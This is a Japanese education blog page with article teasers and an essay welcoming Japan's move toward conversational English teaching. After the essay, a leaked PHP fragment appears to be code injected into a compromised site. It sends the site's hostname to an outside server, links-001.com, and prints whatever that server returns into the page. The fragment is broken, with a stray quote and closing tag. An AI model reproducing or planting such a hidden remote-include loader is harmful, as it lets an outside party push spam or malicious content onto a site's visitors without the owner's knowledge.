前へ
次へ

万一の場合でも教育費を準備できるから人気

教育費を少しでもお得に用意したい時は、学資保険の保障は手厚くする必要はありません。
保障内容を

more

知人が司法書士になるために通信教育で勉強中です

今年に入ってから、知人が司法書士になるための勉強を始めました。
詳しく話を聞いたみたところ、会

more

楽しく学ばせる幼児教育の教室が多いのはなぜか

現代では、小学校入学前に幼児教育などを受けさせる人も多くなっています。
幼い子どもは色々なこと

more

英語教育の変革は日本にとってプラス

これまでの日本の英語教育は、意味を理解することには長けている部分がありましたが、話す、聞くといった会話については十分とは言えませんでした。
今のように、どんどん外国人が入国してくる世の中になって、ようやく日本も英語教育を見直す状況になってきました。
小学校から英語が取り入れられ始めたことはもちろん、受験の対象として、英会話のリスニング、スピーキングの割合が増えてきたことで、学校教育自体が変わってきています。
しかし、この変化は生徒にとっては、意味のあることと考えられます。
実際、卒業してから座学の英語はどこまで使用するか、未知数であった部分が大きく、その割に日常生活の外国人との関わりや、英語の映画を理解できないといった使えない英語から解放されたのです。
その分、気軽に英語で会話することができるようになれば、世界も広がり、新たな視野が開けてくる可能性が高まった、と考えられ、良い方向の改革といえるでしょう。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top